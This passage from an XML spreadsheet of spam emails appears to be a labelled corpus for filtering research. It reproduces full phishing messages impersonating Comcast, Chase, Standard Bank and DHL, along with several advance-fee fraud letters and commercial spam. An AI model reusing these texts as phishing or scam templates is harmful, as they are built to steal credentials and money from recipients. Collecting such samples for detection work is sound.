    <t>Hello! Comcast Email users!  This message is from the Comcast High-Speed Internet informing Comcast  users that there has been upgrade of account and your payment motives  has now changed. This is to alert Comcast Users that you have to store  your payment information with us so as not to disable your account once  the time is due for payment. We have upgraded our system and therefore  we are asking our customers to fill their payment details on-line so as  not to render their Comcast Email account disabled.  heniosifo: TO VERIFY/UPGRADE YOUR COMCAST EMAIL ACCOUNT? C LICK HERE! ([URL]http://www.emailmeform.com[/URL] "Disclaimer: Legally privileged confidential information, binding only if confirmed in writing by a person authorized by Cipla. Please notify sender immediately and permanently delete message if you are not intended recipient. This email is an informal communication and not a definitive opinion of the company or the author. Thoughts or ideas expressed here may be incomplete or in error and subject to further review and change. Thank you." Hello! Comcast Email users! This message is from the Comcast High-Speed Internet informing Comcast users that there has been upgrade of account and your payment motives has now changed. This is to alert Comcast Users that you have to store your payment information with us so as not to disable your account once  the time is due for payment. We have upgraded our system and therefore we are asking our customers to fill their payment details on-line so as  not to render their Comcast Email account disabled.                          heniosifo: TO VERIFY/UPGRADE YOUR COMCAST EMAIL ACCOUNT? C LICK HERE! "Legally privileged confidential information and subject to "Disclaimer".</t>
  </si>
  <si>
    <t>91</t>
  </si>
  <si>
    <t>To: nan\nFrom: "Chase Bank"&lt;belgrade@xmail.net&gt;\nDate: Wed, 20 Jan 2016 01:47:15 +0100</t>
  </si>
  <si>
    <t>Wed, 20 Jan 2016 01:47:15 +0100</t>
  </si>
  <si>
    <t>"Chase Bank"&lt;belgrade@xmail.net&gt;</t>
  </si>
  <si>
    <t>Your Online Banking Passcode Was Reset / kindly fill in all required fields</t>
  </si>
  <si>
    <t>Dear Customer   Your Online Banking Passcode was reset   We're letting you know your Online Banking Passcode was reset on 20/1/2016.   This alert relates to your Online Banking profile,   You can sign in to Online to verify your account by clicking the link below for verification purpose only.   Confirm your information   Link not working? Copy and paste the one below into your browser:  [URL]http://boyterstudio.com[/URL] new style/home/index.html   This is a service email from Chase Bank and Co. Please note that you may receive service emails in accordance with your Chase Banks service agreements, whether or not you elect to receive promotional email.   Chase.com l Privacy, Security &amp; Fraud      Please don't reply directly to this automatically generated email message.      2016 Chase and Co. All rights reserved</t>
  </si>
  <si>
    <t>http://boyterstudio.com</t>
  </si>
  <si>
    <t>4454</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: uvfsPepperl &lt;yhdiana99b@lycos.com&gt;\nDate: Wed, 20 Feb 2002 15:15:14 +0100</t>
  </si>
  <si>
    <t>Wed, 20 Feb 2002 15:15:14 +0100</t>
  </si>
  <si>
    <t>uvfsPepperl &lt;yhdiana99b@lycos.com&gt;</t>
  </si>
  <si>
    <t>.. kennst mich noch ? nehrb</t>
  </si>
  <si>
    <t>Hallo,\n\nWir haben uns schon ziemlich lange nicht mehr gesehen, a ich ja nur noh Zeit fr meine Freundin hatte. \nDAMIT ist jetzt Schlu.\n\nAlex hat mich sitzen lassen. Du erhlst dieses Mail, weil ich Dir mal zeigen will, wie die Kleine wirklich so drauf ist.\nIch hab jetzt vor lauter Wut eine eigene Homepage gebastelt, da kannste mal was sehen:\n[URL]http://alexandra.hobby.privatseite.to[/URL]\n\nWie findest Du das ?\n\nlg\nPeter\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ngcoakgwnibgafjecarccjbjiiqlluijseublait</t>
  </si>
  <si>
    <t>http://alexandra.hobby.privatseite.to</t>
  </si>
  <si>
    <t>1404</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "noreply@standardbank.co.za"&lt;noreply@standardbank.co.za&gt;\nDate: Wed, 20 Apr 2022 18:18:33 +0300</t>
  </si>
  <si>
    <t>Wed, 20 Apr 2022 18:18:33 +0300</t>
  </si>
  <si>
    <t>"noreply@standardbank.co.za"&lt;noreply@standardbank.co.za&gt;</t>
  </si>
  <si>
    <t>Payment confirmation_2022-04-20</t>
  </si>
  <si>
    <t>Dear User,   A payment has been made to your account. Please Sign in Now To view the details of the payment. Thats why weve sent your latest Account eStatement. Please Sign in Now To view or download your statement. To view this statement, youll need to have Adobe PDF Reader installed. To install it, simply:     Copy and paste this URL into your browser:.[URL]www.get.adobe.com[/URL]  Go to the website   Click the download button and follow the easy steps. Done! 	      	  	         	 	 	 	         	 	         	 *Terms and conditions apply. 	      	  	         	  Keeping your money and personal information secure is our priority. If you are concerned about any suspicious activity on your accounts, please call the Fraud Line immediately on: 0800 222 050.	      	  	               	  Authorised financial services and registered credit provider (NCRCP15). The Standard Bank of South Africa Limited (Reg. No. 1962/000738/06). Moving Forward is a trademark of The Standard Bank of South Africa Limited.  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 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 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 The group will never send you any email or other communication asking you to update or provide confidential information about you or your account. If you have any doubts about the legitimacy of this email or other emails you receive claiming to be from Standard Bank please forward them to.phishing@standardbank.co.za For more information about Standard Bank Group Limited see.[URL]www.standardbank.com[/URL] Should you wish to unsubscribe, please send an email to:.Unsubscribe@standardbank.co.za GMS-2700E 5/18     Dear User, A payment has been made to your account. Please Sign in Now To view the details of the payment.That’s why we’ve sent your latest Account eStatement. Please Sign in Now To view or download your statement.To view this statement, you’ll need to have Adobe PDF Reader installed. To install it, simply:  Copy and paste this URL into your browser:.[URL]www.get.adobe.com[/URL] Go to the website  Click the “download” button and follow the easy steps. Done!                   *Terms and conditions apply.            Keeping your money and personal information secure is our priority. If you are concerned about any suspicious activity on your accounts, please call the Fraud Line immediately on: 0800 222 050.           Authorised financial services and registered credit provider (NCRCP15). The Standard Bank of South Africa Limited (Reg. No. 1962/000738/06). Moving Forward is a trademark of The Standard Bank of South Africa Limited. The Standard Bank email disclaimer and confidentiality note:This email, its attachments and any rights attaching hereto are, unless the context clearly indicates otherwise, the property of the Standard Bank Group Limited and/or its subsidiaries ("the group"). It is confidential, private and intended for the addressee only.Should you not be the addressee and receive this email by mistake, kindly notify the sender, and delete it immediately. Do not disclose or use the email in any manner whatsoever.Views and opinions expressed in this email are those of the sender unless clearly stated as those of the group.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The group will never send you any email or other communication asking you to update or provide confidential information about you or your account. If you have any doubts about the legitimacy of this email or other emails you receive claiming to be from Standard Bank please forward them to.phishing@standardbank.co.zaFor more information about Standard Bank Group Limited see.www.standardbank.comShould you wish to unsubscribe, please send an email to:.Unsubscribe@standardbank.co.zaGMS-2700E 5/18</t>
  </si>
  <si>
    <t>www.get.adobe.com www.standardbank.com www.get.adobe.com</t>
  </si>
  <si>
    <t>210</t>
  </si>
  <si>
    <t>To: jose@monkey.org\nFrom: "DHL Express"&lt;shirr@lzu.edu.cn&gt;\nDate: Wed, 20 Apr 2016 02:22:01 +0200</t>
  </si>
  <si>
    <t>Wed, 20 Apr 2016 02:22:01 +0200</t>
  </si>
  <si>
    <t>"DHL Express"&lt;shirr@lzu.edu.cn&gt;</t>
  </si>
  <si>
    <t>Re:Re: Parcel from DHL EXPRESS</t>
  </si>
  <si>
    <t>DHL Capability Tool          Dear jose@monkey.org   Your Parcel(s) listed below is  scheduled for delivery tomorrow.  You have a DHL Parcel addressed to you.  You need to obtain your Tracking Number so as to check the status of the delivery.  Kindly complete the tracking process on our webpage link [URL]www.dhl.com[/URL]   and also confirm your delivery address .  DHL WorldWide Delivery     (c) 2012-2014 DHL International DHL TRACKING DHL Capability Tool Dear jose@monkey.org  Your Parcel(s) listed below is  scheduled for delivery tomorrow. You have a DHL Parcel addressed to you. You need to obtain your Tracking Number so as to check the status of the delivery. Kindly complete the tracking process on our webpage link [URL]www.dhl.com[/URL]  and also confirm your delivery address . DHL WorldWide Delivery  (c) 2012-2014 DHL International</t>
  </si>
  <si>
    <t>www.dhl.com www.dhl.com</t>
  </si>
  <si>
    <t>3330</t>
  </si>
  <si>
    <t>To: nan\nFrom: Mother Doris Killam &lt;motherdorisk61@hotmail.com&gt;\nDate: Wed, 19 Sep 2007 00:52:16 +0100</t>
  </si>
  <si>
    <t>Wed, 19 Sep 2007 00:52:16 +0100</t>
  </si>
  <si>
    <t>Mother Doris Killam &lt;motherdorisk61@hotmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">My Beloved In Christ.  </t>
  </si>
  <si>
    <t>\nBeloved in the Lord Jesus Christ, PLEASE ENDEAVOUR TO USE IT FOR THE\nCHILDREN OF GOD.\n\nMy name is Mother Doris Killam 63years old woman from United States of\nAmerica. I am married to Engineer Pitt Killam who till his death Worked\nwith Willbros, a U.S oil Engineering firm here in Nigeria, we were\nmarried for Thirteen (13) years without a child.\n\nHe died on Saturday, 18 February 2006 after my late husband Eng. Pitt\nand Eight (8) other foreign oil workers were abducted by militia groups\nactive in the Niger Delta Region of Nigeria, on the process of\nnegotiation by the Nigerian Government and the Militant Group\nunfortunately, my\nhusband Eng. Pitt Killam died, before his death, we deposit a sum of\n$2.5 Million Dollars which was proceed of a contract work he just\nconcluded with the Nigerian Ports authority.\n\nPLEASE FIND FACT ON THE INFORMATION FROM THE WEBSITE BELOW.\n\n[URL]http://news.bbc.co.uk[/URL]\n\nAfter his painful death I decided not to re-marry or get a child\noutside my matrimonial home. My Doctor told me that I would not last\nfor the\nnext three months due to cancer problem. Though what disturbs me most\nis my partial stroke as a result of high blood pressure.\n\nHaving known my condition I decided to donate this funds to church or\nbetter still a Christian individual that will utilize this money the\nway\nI am going to instruct herein. I want a church or individual that will\nuse this money to fund churches, orphanages and widows propagating the\nword of God and to ensure that the house of God is maintained.\n\nThe Bible made us to understand that blessed is the hand that grivet. I\ntook this decision because I dont have any child that will\ninherit\nthis money and my husband's relatives are not Christians and I\ndont\nwant my husband's hard earned money to be misused by unbelievers. I\ndont want a situation where this money will be used in an\nungodly\nmanner, hence the reason for taking this bold decision.\n\nI am not afraid of death hence I know where I am going. I know that I\nam going to be in the bosom of the Lord. Exodus 14 VS 14 says that the\nlord will fight my case and I shall hold my peace. With God all things\nare possible. As soon as I receive your reply I will want you to give\nme\nyour\n\nName:...........................\nAddress:........................\nSex/age:........................\nPhone:..........................\nOccupation:.....................\n\nI will send a copy to the bank. For identification when you will\ncontact them. I want you and the church to always pray for me because\nthe\nlord is my shepherd and I shall not want.\n\nMy happiness is that I lived a life of a worthy Christian. Please\nassure me that you will act accordingly as I stated herein.\n\nNote: this must be kept confidentially from eyes and ears of my\nhusband's family. Hoping to hear from you.\n\nReply me and Remain blessed in the name of the Lord.\n\nRegards,\nMrs. Doris Killam.\n\nPrivate email Reply me here:(motherdorisk9@yahoo.com.hk)\n_________________________________________________________________\nConnect to the next generation of MSN Messenger \n[URL]http://imagine-msn.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://imagine-msn.com</t>
  </si>
  <si>
    <t>465</t>
  </si>
  <si>
    <t>To: R@M\nFrom: Rose Savimbi &lt;rosesav1@webave.com&gt;\nDate: Wed, 19 Nov 2003 14:58:38 -0600</t>
  </si>
  <si>
    <t>Wed, 19 Nov 2003 14:58:38 -0600</t>
  </si>
  <si>
    <t>Rose Savimbi &lt;rosesav1@webave.com&gt;</t>
  </si>
  <si>
    <t>rose</t>
  </si>
  <si>
    <t>Hello My Dear,\n\n   I am mrs rose savimbi please i need your help since after the \n incidence that lead to the death of my late husband\nMRJONAS SAVIMBI of unita of Angola .\n\nI know we have not met before \n but I am contacting you with due sense of humanity responsibility \nand the few awareness that you will give it a mutual understanding\n \n I am soliciting for an assistance to move the sum $24 million USD to \n your country for investment The fund is presently in a security \n company in Holland for safety since on the 12- 2- 1999. The real \n content was not declared as it was kept as photographic equipment I \n need you as partner to assist in transferring the fund and provide \n good investment plans for it.\n \nThe fund will be under your investment control for three years \n during which only the profit will be shared annually 70% for me and \n30% for you annually\n\n  I am a Christian with the fear of GOD in any thing I am doing so  please\nI want us to build \n\ntrust to each other. you should always reply me through this new email\naddress if you are \ninterested(   rosesav40@yahoo.fr)\n\n\n Thanks in anticipation of your response\n Best regards\nMRS ROSE SAVIMBI\n\n\n\nMs. Savimbi,\n\n\n\n\n\n_____________________________________________\nFree email with personality! Over 200 domains!\n[URL]http://www.MyOwnEmail.com[/URL]\nLooking for friendships,romance and more?\n[URL]http://www.MyOwnFriends.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://www.MyOwnEmail.com http://www.MyOwnFriends.com</t>
  </si>
  <si>
    <t>1089</t>
  </si>
  <si>
    <t>To: dankaro1@yaphoo.com\nFrom: donatus &lt;donatusokobi@sapibon.com&gt;\nDate: Wed, 19 Jan 2005 06:48:32 -0500</t>
  </si>
  <si>
    <t>Wed, 19 Jan 2005 06:48:32 -0500</t>
  </si>
  <si>
    <t>donatus &lt;donatusokobi@sapibon.com&gt;</t>
  </si>
  <si>
    <t>dankaro1@yaphoo.com</t>
  </si>
  <si>
    <t>Urgent Greeting,</t>
  </si>
  <si>
    <t>Urgent Greeting, \nBARRISTER DONATUS OKOBI \nEmail:donatusokobi1@excite.com\nPLEASE REPLY ME ON MY ALLTERNATIVE EMAIL:donatusokobi1@excite.com\n\nReply To: donatusokobi1@excite.com\n\nAttn:  \nDear Friend, \n\nI am BARRISTER Donatus Okobi, personal Attorney to the late MICHAEL OTTO SULLIVAN.of Philadelphia, A national of your country, My late client was involved in an {AIR CRASH} that occurred on Jan Thursday 9th 2003 With an air craft {US Airways Express Flight 5481 } which crashed Wednesday at Charlotte/Douglas International Airport, killing all 21 aboard passengers were involved as you can confirm from the website below;{[URL]http://www.thestate.com[/URL] } \n\nI got your contact through the help of my sister-in-law that works with the American Chambers of Commerce and Tourism, due I did not disclose to her my humble intention for an honest foreigner like you, Having noted the confidence reposed on your person by the sponsor of the recommendation, \n\nMy late client was as well a one time secret Agent in transferring of money overseas for the late head of state of Nigeria {GENERALSANI ABACHA }. Before his death On Jan Thursday 9th 2003, My client Deposited the total sum of US$20,000,000.00 { TWENTY MILLION UNITED STATES DOLLARS } In {IMPERIAL BANKING CORPRATION} hoping of transferring the fund to his country as soon as he comes back \nfrom conference. \n\nUnion Bank Nigeria Plc \nACCOUNT NUMBER: 2342765709/784768 \nROUTING NUMBER: 2342657765 \nCODE: UBN/LILLACWONG/99/05 \nBENEFICIARY'S NAME: \nMR.MICHAEL OTTO SULLIVAN \nAMOUNT: $20 MILLION UNITED \nSTATES DOLLARS \n\n= \n\nAfter these several unsuccessful attempts, I decided to trace his name over the Internet, to locate any member of his family. I have contacted you to assist in repatriating the money and properties left behind by my client before he get confiscated or declared unserviceable by the Bank where this huge deposit were lodged. \n\nParticularly, the {U.B.N} Where the decease had an account valued at about US$20m, Has issued me a notice to provide the {NEXT OF KIN} or have the account confiscated within the next 10 official working days. \n\nSince I have been unsuccessful in locating the relatives, I seek your consent to present you as the {NEXT OF KIN} of the decease since you are a foreigner to suite the purpose of the transaction. We have agree to share the money as follows,. 60% to me and 30% to you, While 10% has been set aside for any incidental expenses that may come up during this transaction by both parties, including the phone bills, etc. \n\n \n\nPlease, get in touch with me by my private email address to enable  us to claim the fund immediately {donatusokobi1@excite.com} I hope  to hear from you soon. \n\nMore importantly, you are strictly advice to send your reply to my Private and personal email address bellow for security and confidential reason donatusokobi1@excite.com \n\nThanks and God bless \n\nBARRISTER DONATUS OKOBI\n\nPLEASE REPLY ME ON MY ALLTERNATIVE EMAIL:donatusokobi1@excite.com\n\n\n</t>
  </si>
  <si>
    <t>http://www.thestate.com</t>
  </si>
  <si>
    <t>2005</t>
  </si>
  <si>
    <t>To: nan\nFrom: nan\nDate: Wed, 19 Apr 2006 21:34:17 +0000</t>
  </si>
  <si>
    <t>Wed, 19 Apr 2006 21:34:17 +0000</t>
  </si>
  <si>
    <t>DEAR FRIEND.</t>
  </si>
  <si>
    <t>CHAIRMAN TENDER\nBOARD OF NIGERIAN\nNATIONAL PETROLEUM\nCOPORATION (N.N.P.C)\nTEL:+234-80-33013920\nFAX:+234-1-7597156\nEMAIL:drezenchi1@ecplaza.net\n\nDEAR FRIEND,\n\nI GUESS THIS LETTER MAY COME TO YOU AS A SURPRISE SINCE I HAD NO PREVIOUS CORRESPONDENCE WITH YOU.I AM THE CHAIRMAN TENDER BOARD OF NIGERIA NATIONAL PETROLEUM COPORATION (NNPC) I GOT YOUR CONTACT IN THE COURSE OF MY SEARCH FOR A RELIABLE PERSON WITH WHOM TOHANDLE A VERY CONFIDENTIAL TRANSACTION INVOLVING THE TRANSFER OF FUND VALUED EIGHT MILLION TWO HUNDRED THOUSAND UNITED STATES DOLLARS ($8.2M) TO A SAFE FOREIGN ACCOUNT.\n\nTHE ABOVE FUND IN QUESTION IS NOT CONNECTED WITH ARMS,DRUGS OR MONEY LAUNDERING. IT IS THE PRODUCT OF OVER INVOICE ON CONTRACT AWARDED IN 2003 BY NNPC, TO A FOREIGN COMPANY FOR THE TURN AROUND MAINTAINERS OF NIGERIA OIL REFINARIES IN KADUNA STATE,DELTA STATE,AND LAGOS STATES OF NIGERIA.THE CONTRACT HAS LONG BEEN EXECUTED AND PAYMENT OF THE ACTUAL CONTRACT AMOUNT MADE TO THE FOREIGN CONTRACTOR, LEAVING THE BALANCE OF $8.2M U.S DOLLARS IN A DORMANT ACCOUNT WHICH MY COLLEAGUES AND WE NOW WANT TO TRANSFER OUT OF NIGERIA INTO A RELIABLE FOREIGN ACCOUNT FOR OUR PERSONAL USE.\n\nAS CIVIL SERVANTS, WE ARE NOT ALOWED BY THE LAW OF THE FEDERATION TO OPERATE A FOREIGN BANK ACCOUNT.THEREFORE IT BECOMES NECESSARY TO LOOK FOR A FOREIGN COMPANY WITH THE CAPABILITY TO ACT AS THE ORIGINAL BENEFICIARY OF THE CONTRACT.MY DEAR, IT IS A GOOD THING THAT THE PRESIDENT HAS ENDORSED THE RESOLUTION PASSED BY THE SENATE THAT ALL FOREIGN CONTRACTORS OWED BY THE FEDERAL GOVERNMENT OF NIGERIA SHOULD BE PAID, WE WILL SEIZE THIS GOOD OPPORTUNITY TO PURPORT YOU AS ONE OF THE BENEFICIARIES TO BE PAID.\n\nIF YOU ARE INTERESTED IN THIS PROPOSAL KINDLY SEND TO US YOUR LETTER OF ACCEPTANCE ALONG WITH YOUR DIRECT TELEPHONE AND FAX NUMBERS, BUT IF YOU CANNOT FOR ANY REASON HANDLE THIS TRANSACTION I SHOULD BE GRATEFUL IF YOU CAN INTRODUCE IT TO A RELIABLE AND TRUST WORTHY PERSON IN WHICH IN ANY CASE YOUR INTEREST WILL BEPROPERLY TAKEN CAREOF.MEANWHILE, MY COLLEAGUES AND I HAVE DECIDED TO SHARE THE MONEY IN THE FOLLOWING RATIO: 70% FOR MY COLLLEAGUES AND I, THEN 20% FOR YOU THE ACCOUNT OWNERAND 10% FOR ALL LOCAL AND INTERNATIONAL EXPENSES THAT MAY ARISE IN THE COURSE OF THIS TRANSACTION.FUTHER DETAILS ABOUT THIS TRANSACTION WILL BE DISCUSSED IN THE SUBSEQUENT CORRESPONDENCE.\n\nTHIS TRANSACTION IS STRICTLY CONFIDENTIAL BUT 100% RISK FREE FOR BOTH OF US. NOTE ALSO THAT THE PARTICULAR NATURE OF YOUR BUSINESS IS IRRELEVANT TO THIS TRANSACTION AND THIS TRANSACTION IS EXPECTED TO BE CONCLUDED WITHIN 14 BANK WORKING DAYS SINCE ALL LOCAL CONTACTS ANDARRANGEMENTS HAVE BEEN PROPERLY PERFECTED FOR A SMOOTH AND SUCCESSFUL CONCLUSION OF THIS TRANSACTION.\n\nYOURS FAITHFULLY,\nDR EZE N. MARK.\nCHAIRMAN(TBNNPC).\n\nN:B,PLEASE FOR THE BEST INTREST AND SECURITY OF THIS TRANSACTION,SEND YOUR REPLIES TO MY PRIVATE EMAIL ADDRESS(drezenchi1@ecplaza.net) AND CALL MY PRIVATE CEL PHONE:234-80-33013920 FOR MORE EXPLANATIONS,\nTHANKS.\n\n________________________________________________________________________\nSERVIZIO VOICE: TELEFONA e INVIA SMS dal tuo computer a tariffe vantaggiose! \nScopri come telefonare e videochiamare gratis da pc a pc.\n[URL]http://voice.repubblica.it[/URL]\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://voice.repubblica.it</t>
  </si>
  <si>
    <t>2001</t>
  </si>
  <si>
    <t>To: vivian1@alibi.com.mk\nFrom: viviansaja &lt;vivian1@alibi.com.mk&gt;\nDate: Wed, 19 Apr 2006 17:15:56 +0200</t>
  </si>
  <si>
    <t>Wed, 19 Apr 2006 17:15:56 +0200</t>
  </si>
  <si>
    <t>viviansaja &lt;vivian1@alibi.com.mk&gt;</t>
  </si>
  <si>
    <t>vivian1@alibi.com.mk</t>
  </si>
  <si>
    <t>From: Miss Vivian Saja</t>
  </si>
  <si>
    <t>\nFrom: Miss Vivian Saja\nAbidjan Cote D'Ivoire\n  \nDear,\n  \nIt is my pleasure to write you after much consideration \nsince telephone  communication can not be suitable enough \nto communicate to you at first.I am Miss Vivian Saja the \nonly doughter of late Mr Mathew  Saja of Sierra-Leone (SL) \nI am 24 years of age. My late father was limited liability \nin Cocoa and Gold merchant in  Sierra-Leone before his \nuntimely death. After his business trip to Abidjan-Cote \nd'Ivoire,to negociate on a cocoa and gold business he \nwanted to invest in Abidjan - Cote d'Ivoire.\n  \nA Week after he came back from Abidjan, he got an \naccidente with my mother of which my mother died instantly \nbut my father died after five days in a private hospital \non that faithful afternoon. I didn't know that my father \nwas going to leave me after I had lost my  mother. \nBut before he gave up the ghost, it was as if he knew he \nwas going to die. He my father, MAY HIS SOUL REST IN \nPERFECT PEACE he disclosed to me that he deposited sum of \n$9.7,000,000,00 US Dollars (NINE MILLION SEVEN HUNDRED \nTHOUSAND DOLLARS) in a Bank here in Abidjan- Cote \nd'ivoire.\n\nThat the money was meant for his cocoa and Gold company he \nwanted to establish in Abidjan - Cote d'Ivoire though, He \nsingle handed me the deposit certificate and instructed me \nto seek for a reliable and trust worthy business partner \nfor my life time investment abroad. Now I have succeded in \nlocating the bank here in Abidjan- Cote d'ivoire and also \nconfirmed the bank with most honest and confidentiality. \n  Now I am soliciting for your assistance to help me lift \nthis money out from Abidjan to your safe account abroad so \nthat we should invest it in any meaningful lucrative \nbusiness in your country because this is my only hope in \nlife.\n  \nAwaiting anxiously to hear from you so that we can discuss \nthe modalities of this transaction.  Please kindly contact \nme immediately  for more discussion.\n  \nPlease don't hesitate to send me a message.Thanks for your \nkind attention.\n  \nYours sincerely\nMiss Vivian Saja\n\nPlease i will like you to contact me through this email \naddress: vian_saja4@yahoo.de\n________________________________________________\n..:: [URL]www.alibi.com.mk[/URL] ::..\n\n\n</t>
  </si>
  <si>
    <t>www.alibi.com.mk</t>
  </si>
  <si>
    <t>4432</t>
  </si>
  <si>
    <t>To: qpwzztnclt@onlineisbest.com\nFrom: firstever001@44yes.onlineisbest.com\nDate: Wed, 18 Sep 2002 23:32:28 -0400</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 23:32:28 -0400</t>
  </si>
  <si>
    <t>firstever001@44yes.onlineisbest.com</t>
  </si>
  <si>
    <t>qpwzztnclt@onlineisbest.com</t>
  </si>
  <si>
    <t>ADV: Extended Auto Warranties Here hvgxs</t>
  </si>
  <si>
    <t>Protect your financial well-being.\nPurchase an Extended Auto Warranty for your Car today. \n\nCLICK HERE for a FREE no obligation quote.\n[URL]http://ww3.onlineisbest.com[/URL]\n     \nCar troubles always seem to happen at the worst possible time. \nProtect yourself and your family with a \nquality Extended Warranty for your car, truck, or SUV, \nso that a large expense cannot hit you all at once. \n\nWe cover most vehicles with less than 150,000 miles.\n    \nBuy DIRECT! Our prices are 40-60% LESS!\n    \nWe offer fair prices and prompt, toll-free claims service.  \n\nGet an Extended Warranty quote for your car today.\n    \nWarranty plan also includes:\n    \n  1)   24-Hour Roadside Assistance.\n  2)   Rental Benefit.\n  3)   Trip Interruption Intervention.\n  4)   Extended Towing Benefit.\n    \nCLICK HERE for a FREE no obligation quote.\n[URL]http://ww3.onlineisbest.com[/URL]\n           \n          \n          \n          \n        \n---------------------------------------\nTo easily remove your address from the list, go to: \n[URL]http://ww3.onlineisbest.com[/URL]\nPlease allow 48-72 hours for removal.</t>
  </si>
  <si>
    <t>http://ww3.onlineisbest.com http://ww3.onlineisbest.com http://ww3.onlineisbest.com</t>
  </si>
  <si>
    <t>4428</t>
  </si>
  <si>
    <t>To: &lt;zzzz@spamassassin.taint.org&gt;\nFrom: "IQ - DUS" &lt;dus@insiq.us&gt;\nDate: Wed, 18 Sep 2002 20:04:22 -0400</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 20:04:22 -0400</t>
  </si>
  <si>
    <t>"IQ - DUS" &lt;dus@insiq.us&gt;</t>
  </si>
  <si>
    <t>Impaired Risk Case of the Month</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_4098D_01C25F36.D7652D00 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: quoted-printable  Diversified Underwriters Services, Inc.  Impaired Risk Case of the Month August 2002  Male 64 Non-smoker  Face Amount $6,000,000  History of Arterial Sclerotic Heart Disease  Coronary Artery Disease  Abnormal Echocardiogram  Increasing Abnormal PSA  Currently on Chelation Therapy  Competition Rated Table 4=20  Diversified's Answer...  Preferred! Broker's Commission: $69,576 !!  =09 Let Us Turn Your Clients That Have Been Declined, Rated or Have Current Health Problems, Into Placeable Life Cases!   =09  "INST-A-QUOTE"(tm) for Impaired Risk Life Quotes  Call Now for an "Inst-A-Quote"=99 on your client and we will get back = to you within 24 hours! 800-683-3077 ext. 0=97 or =97 Please fill out the form below for more information	=20 Name:	 	  =09 E-mail:	 	=20 Phone:	 	=20 City:	 	 State:	 	=20  	    =09 =20   	=20 For Broker Use Only. Not for Public Dissemination.	=20 We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insuranceiq.com[/URL] =20 Legal Notice  =20 ------=_NextPart_000_4098D_01C25F36.D7652D00 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Impaired Risk Case of the Month =20     =20       =20        =20            =20                   =20                   Male 64 Non-smoker Face Amount $6,000,000 History of Arterial Sclerotic Heart = Disease Coronary Artery Disease Abnormal Echocardiogram Increasing Abnormal PSA Currently on Chelation Therapy Competition Rated Table 4=20                    Broker's Commission: $69,576 !! =20                  =20            Let Us Turn Your Clients That = Have Been=20             Declined, Rated or Have = Current=20             Health Problems, Into Placeable=20             Life Cases!              =20            =20            =20             =20             =20             — or — =20                  =20                      =20                         Please fill out the form below for more = information =20                         Name: =20                         E-mail: =20                         Phone: =20                         City: State: =20                           =20                            =20            =20           For Broker Use Only. Not for Public = Dissemination. =20       We don't=20         want anyone to receive our mailings who does not wish to. This = is professional=20         communication sent to insurance professionals. To be removed = from this=20         mailing list, DO NOT REPLY to this message. Instead, go = here: =20         [URL]http://www.Insuranceiq.com[/URL] Legal Notice=20 =20 ------=_NextPart_000_4098D_01C25F36.D7652D00--</t>
  </si>
  <si>
    <t>http://www.Insuranceiq.com http://www.Insuranceiq.com</t>
  </si>
  <si>
    <t>4427</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: CopyYourDVD-NOW &lt;atomicDOT@lists.tilw.net&gt;\nDate: Wed, 18 Sep 2002 11:43:02 PST</t>
  </si>
  <si>
    <t>Wed, 18 Sep 2002 11:43:02 PST</t>
  </si>
  <si>
    <t>CopyYourDVD-NOW &lt;atomicDOT@lists.tilw.net&gt;</t>
  </si>
  <si>
    <t>Friend,Instantly Copy ANY DVD or Playstation Game with this software......</t>
  </si>
  <si>
    <t>--------------103237257898946 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Friend,Now you can copy DVD's and Games [URL]http://www.terra.es[/URL] BACKUP DVD VIDEO's WITH YOUR CD-R BURNER With 321 studio's software, you can now copy any DVD and Playstation Game.  Never buy another  backup DVD movie again.  Just copy it! This is the first time this software is being made available to the public. All the software you need  to burn your own DVD Video, is included in 321 Studio's  software package DVD Copy Plus!  The movies will play  in a standard DVD player. With detailed, easy to follow,  step-by-step instructions, you can BURN your own DVD  Video using nothing more than your DVD-ROM  and CD-R drives. Purchase a copy! Click below. [URL]http://www.terra.es[/URL] Order today and receive! *Step by Step Interactive Instructions *All Software Tools Included On CD *No DVD Burner Required *FREE Live Technical Support *30 Day Risk Free Trial Available With DVD Copy Plus you can backup Your DVD Movies with  the same 74min or 80min CD-R's you've used in the past  to create audio CD's. Our software compresses the large  DVD files on your standard DVD to VCD, SVCD, and DivX  much the same way the popular MP3 format compresses audio.   Order today and start burning [URL]http://www.terra.es[/URL] Thank You, CopymyDVD [URL]http://inglesa.net[/URL] We take your privacy very seriously and it is our policy never to send unwanted email messages. This message has been sent to zzzz@spamassassin.taint.org because you originally joined one of our member sites or you signed up with a party that has contracted with atomicDOT. Please [URL]http://tilw.net[/URL] to Unsubscribe (replying to this email WILL NOT unsubscribe you).  TRCK:atomicDOT;mp*qhwqrwhlqf!frp;8; --------------103237257898946 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Backup your DVD's   With DVDCopyPlus            and PowerCDR5.0 you can copy and burn your   DVD Movies Playstation  MP3s, AVIs and all              other multimedia Files Software, Music              CDs (perfect RAW data duplication) NEW! Burn to CD-R              or DVD-R Protect your            investments by backing up your CD, DVD, MP3, Data and Game collections            with burned copies that really work! Separately, DVDCopyPlus and PowerCDR5.0            are over $100 worth of software that you can purchase bundled right            now for just $49.99! THAT'S 50% OFF! MORE DETAILS ORDER NOW     We take your privacy very seriously and it is our policy never to send unwanted email messages.  This message has been sent to zzzz@spamassassin.taint.org because you originally joined one of our member sites or you signed up with a party that has contracted with atomicDOT.  Please Click Here to Unsubscribe  (replying to this email WILL NOT unsubscribe you).   &lt;&gt; TRCK:atomicDOT;mp*qhwqrwhlqf!frp;8; 